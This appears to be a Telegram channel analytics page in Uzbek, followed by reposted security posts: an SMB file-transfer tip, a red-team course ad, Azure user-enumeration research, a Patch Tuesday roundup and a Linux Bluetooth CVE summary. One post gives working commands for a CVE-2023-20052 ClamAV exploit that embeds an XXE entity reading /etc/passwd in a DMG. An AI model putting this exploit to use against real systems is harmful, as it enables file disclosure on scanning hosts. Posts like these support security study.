Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
All Security Engineering Courses
Kanalga Telegram’da o‘tish
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!
Ko'proq ko'rsatish📈 Telegram kanali All Security Engineering Courses analitikasi
All Security Engineering Courses (@allsecurityengineeringcourses) Ingliz til segmentidagi kanali faol ishtirokchi. Hozirda hamjamiyat 18 795 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 7 162-o'rinni va Rossiya mintaqasida 35 950-o'rinni egallagan.
📊 Auditoriya ko‘rsatkichlari va dinamika
невідомо sanasidan buyon loyiha tez o‘sib, 18 795 obunachiga ega bo‘ldi.
15 Iyun, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 133 ga, so‘nggi 24 soatda esa 4 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.
- Tasdiqlash holati: Tasdiqlanmagan
- Jalb etish (ER): Auditoriya o‘rtacha 10.04% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining 3.00% ini tashkil etuvchi reaksiyalarni to‘playdi.
- Post qamrovi: Har bir post o‘rtacha 1 887 marta ko‘riladi; birinchi sutkada odatda 563 ta ko‘rish yig‘iladi.
- Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 3 ta reaksiya keladi.
- Tematik yo‘nalishlar: Kontent git, strace, github, linux, docker kabi asosiy mavzularga jamlangan.
📝 Tavsif va kontent siyosati
Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
“This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...”
Yuqori yangilanish chastotasi (oxirgi ma’lumot 16 Iyun, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.
18 795
Obunachilar
+424 soatlar
+357 kunlar
+13330 kunlar
Postlar arxiv
Transfer files easily between a Kali Linux and Windows system by running an SMB service on Kali and accessing it from the Windows system.
Run this on Kali:
Impacket-smbserver -smb2support -username vonnie -password 'Password-123!' foo .
Access from the Windows side (by IP):
\\192.168.1.158\foo\
Repost from Red Team Alerts
Transferring files from windows to kali using Impacket smbserver.py doesn't work?
Transferring files from kali to windows is easy with something like python http.server. What about transferring files from windows to kali? I found very useful blog post here and attempted to do similar thing with Impacket smbserver.pyhttps://blog.ropnop.com/transferring-files-from-kali-to-windows/#smbSetup
Kali: 172.16.1.10 Windows: 172.16.1.50Run smbserver on Kali with Impacket smbserver.py
└─$ /usr/share/doc/python3-impacket/examples/smbserver.py share /tmp Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation [*] Config file parsedHowever, whenever I try on Windows, I'm getting "System error 53 has occurred, The network path was not found" as follows:
C:\>net view \\172.16.1.10\ System error 53 has occurred. The network path was not found.Here is the message on Impacket smbserver.py
[*] Incoming connection (172.16.1.50,56201) [*] Closing down connection (172.16.1.50,56201) [*] Remaining connections []Then, I tried again with \share, but still getting the same error
C:\>net view \\172.16.1.10\share System error 53 has occurred. The network path was not found.What's wrong and what should I do to make this right? Discuss on Reddit: https://ift.tt/xlSZ4m2 @redteamalerts
Webinar Assessing the Security of Your Active Directory Privileged Account Risks and Controls
🔥Red Team and Adversary Simulation with BruteRatel C4 🔥
💥Add this to your personal collection to view offline!💥
💥 Red Team and Adversary Simulation with BruteRatel C4 💥
My big THANK YOU to all following my Telegram channel!
Also here: https://www.youtube.com/playlist?list=PLl7h-59muprN-LS_WRKq1ldsknCDJm25O
UPCOMING UPLOAD...
Repost from RT x TEAM </>
@nyxgeek
I think most pentesters have used the classic OWA time-based user enum at some point. Or time-based enum in Lync.
What if I told you that time-based user enum lives on in Azure? And it's tied to Basic Auth.
Basic Auth is dead. Long live Basic Auth!
https://trustedsec.com/blog/kicking-it-old-school-with-time-based-enumeration-in-azure
CVE-2023-20052 exploit
(https://github.com/nokn0wthing/CVE-2023-25002)To create malicious DMG file:
$ git clone https://github.com/nokn0wthing/CVE-2023-20052.git
$ cd CVE-2023-20052
$ sudo docker build -t cve-2023-20052 .
$ sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash
$ genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
$ bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg
To trigger exploit:
$ clamscan --debug exploit.dmg
Hello everyone! This episode will be about Microsoft Patch Tuesday for July 2023, including vulnerabilities that were added between June and July Patch Tuesdays.
Vulristics improvements
00:11 Works faster
01:31 Microsoft ADVs
02:45 Comments Table
TOP
04:09 Remote Code Execution – Microsoft Office (CVE-2023-36884)
05:06 Security Feature Bypass – Windows SmartScreen (CVE-2023-32049)
05:48 Security Feature Bypass – Microsoft Outlook (CVE-2023-35311)
06:37 Elevation of Privilege – Windows Error Reporting Service (CVE-2023-36874)
07:16 Elevation of Privilege – Windows MSHTML Platform (CVE-2023-32046)
Other RCEs
08:10 Remote Code Execution – Windows Active Directory Certificate Services (AD CS) (CVE-2023-35350)
09:01 Remote Code Execution – Microsoft Message Queuing (CVE-2023-32057, CVE-2023-35309)
09:44 Remote Code Execution – Windows Routing and Remote Access Service (RRAS) (CVE-2023-35365, CVE-2023-35366, CVE-2023-35367)
10:24 Remote Code Execution – Windows Layer-2 Bridge Network Driver (CVE-2023-35315)
10:57 Remote Code Execution – Microsoft SharePoint (CVE-2023-33134, CVE-2023-33157, CVE-2023-33159, CVE-2023-33160)
11:42 Remote Code Execution – Windows Pragmatic General Multicast (PGM) (CVE-2023-35297)
🎞 Video
(https://youtu.be/vvQFMHt64X4)🎞 Video2 (for Russia)
(https://vk.com/video-149273431_456239131)📘 (https://avleonov.com/vulristics_reports/ms_patch_tuesday_june2023_report_with_comments_ext_img.html)Blogpost
(https://avleonov.com/2023/07/28/microsoft-patch-tuesday-july-2023-vulristics-improvements-office-rce-sfb-smartscreen-and-outlook-eop-mshtml-and-ers-other-rces/)🗒 Vulristics report
(https://avleonov.com/vulristics_reports/ms_patch_tuesday_july2023_report_with_comments_ext_img.html)На русском
(https://t.me/avleonovrus/722)@avleonovcom #AD #ADV #DarkReading #EoP #ERS #Kaspersky #KrebsOnSecurity #Layer2Bridge #Microsoft #MicrosoftOffice #MSHTML #MSMQ #Outlook #PGM #Qualys #Rapid7 #RCE #RRAS #SFB #SharePoint #SmartScreen #SophosNakedSecurity #Tenable #TheHackerNews #Vulristics #ZDI
YouTube (https://youtu.be/vvQFMHt64X4)
Microsoft Patch Tuesday July 2023: Vulristics improvements, Office RCE, SFB SmartScreen and Outlook
Hello everyone! This episode will be about Microsoft Patch Tuesday for July 2023, including vulnerabilities that were added between
Linux Bluetooth: Unauthorized management command execution (https://github.com/lrh2000/CVE-2023-2002) (CVE-2023-2002, PoC exploit (https://github.com/lrh2000/CVE-2023-2002/blob/master/exp/bt_power.c) included)
An insufficient permission check has been found in the Bluetooth subsystem of the Linux kernel when handling ioctl system calls of HCI sockets. This causes tasks without the proper CAP_NET_ADMIN capability can easily mark HCI sockets as trusted. Trusted sockets are intended to enable the sending and receiving of management commands and events, such as pairing or connecting with a new device. As a result, unprivileged users can acquire a trusted socket, leading to unauthorized execution of management commands. The exploit requires only the presence of a set of commonly used setuid programs.
If successfully exploited, the identified vulnerability has the potential to compromise the confidentiality, integrity, and availability of Bluetooth communication. Attackers can exploit this vulnerability to pair the controller with malicious devices, even if the Bluetooth service is disabled or not installed.
